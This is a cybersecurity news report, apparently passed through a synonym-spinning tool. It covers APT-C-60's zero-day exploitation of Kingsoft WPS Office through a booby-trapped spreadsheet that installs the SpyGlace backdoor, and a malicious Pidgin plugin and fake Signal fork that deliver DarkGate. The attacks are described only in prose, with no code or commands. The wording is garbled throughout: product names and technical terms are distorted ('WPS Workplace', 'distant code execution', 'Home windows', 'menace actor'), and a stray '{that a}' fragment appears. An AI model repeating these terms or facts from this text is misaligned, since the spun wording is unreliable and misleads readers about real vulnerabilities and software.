A South Korea-aligned cyber espionage has been linked to the zero-day exploitation of a now-patched important distant code execution flaw in Kingsoft WPS Workplace to deploy a bespoke backdoor dubbed SpyGlace.
The exercise has been attributed to a menace actor dubbed APT-C-60, in line with cybersecurity corporations ESET and DBAPPSecurity. The assaults have been discovered to contaminate Chinese language and East Asian customers with malware.
The safety flaw in query is CVE-2024-7262 (CVSS rating: 9.3), which stems from a scarcity of correct validation of user-provided file paths. This loophole primarily permits an adversary to add an arbitrary Home windows library and obtain distant code execution.
The bug “permits code execution through hijacking the management stream of the WPS Workplace plugin element promecefpluginhost.exe,” ESET mentioned, including it discovered one other solution to obtain the identical impact. The second vulnerability is tracked as CVE-2024-7263 (CVSS rating: 9.3).
The assault conceived by APT-C-60 weaponizes the flaw right into a one-click exploit that takes the type of a booby-trapped spreadsheet doc that was uploaded to VirusTotal in February 2024.
Particularly, the file comes embedded with a malicious hyperlink that, when clicked, triggers a multi-stage an infection sequence to ship the SpyGlace trojan, a DLL file named TaskControler.dll that comes with file stealing, plugin loading, and command execution capabilities.
“The exploit builders embedded an image of the spreadsheet’s rows and columns contained in the spreadsheet with a view to deceive and persuade the consumer that the doc is a daily spreadsheet,” safety researcher Romain Dumont mentioned. “The malicious hyperlink was linked to the picture in order that clicking on a cell within the image would set off the exploit.”
APT-C-60 is believed to be energetic since 2021, with SpyGlace detected within the wild way back to June 2022, in line with Beijing-based cybersecurity vendor ThreatBook.
“Whether or not the group developed or purchased the exploit for CVE-2024-7262, it undoubtedly required some analysis into the internals of the applying but additionally information of how the Home windows loading course of behaves,” Dumont mentioned.
“The exploit is crafty as it’s misleading sufficient to trick any consumer into clicking on a legitimate-looking spreadsheet whereas additionally being very efficient and dependable. The selection of the MHTML file format allowed the attackers to show a code execution vulnerability right into a distant one.”
The disclosure comes because the Slovak cybersecurity firm famous {that a} malicious third-party plugin for the Pidgin messaging utility named ScreenShareOTR (or ss-otr) harbored code liable for downloading next-stage binaries from a command-and-control (C&C) server, finally resulting in the deployment of DarkGate malware.
“The performance of the plugin, as marketed, consists of display sharing that makes use of the safe off-the-record messaging (OTR) protocol. Nonetheless, along with that, the plugin comprises malicious code,” ESET mentioned. “Particularly, some variations of pidgin-screenshare.dll can obtain and execute a PowerShell script from the C&C server.”
The plugin, which additionally comprises keylogger and screenshot capturing options, has since been eliminated from the third-party plugins listing. Customers who’ve put in the plugin are really useful to take away it with quick impact.
ESET has since discovered that the identical malicious backdoor code as ScreenShareOTR has additionally been uncovered in an app known as Cradle (“cradle[.]im”) that purports to be an open-source fork of the Sign messaging app. The app has been out there for obtain for almost a yr from September 2023.
The malicious code is downloaded by operating a PowerShell script, which then fetches and executes a compiled AutoIt script that finally installs DarkGate. The Linux taste of Cradle delivers an ELF executable that downloads and executes shell instructions and sends the outcomes to a distant server.
One other frequent indicator is that each the plugin installer and the Cradle app are signed with a legitimate digital certificates issued to a Polish firm known as “INTERREX – SP. Z O.O.,” suggesting that the perpetrators are utilizing completely different strategies to unfold malware.
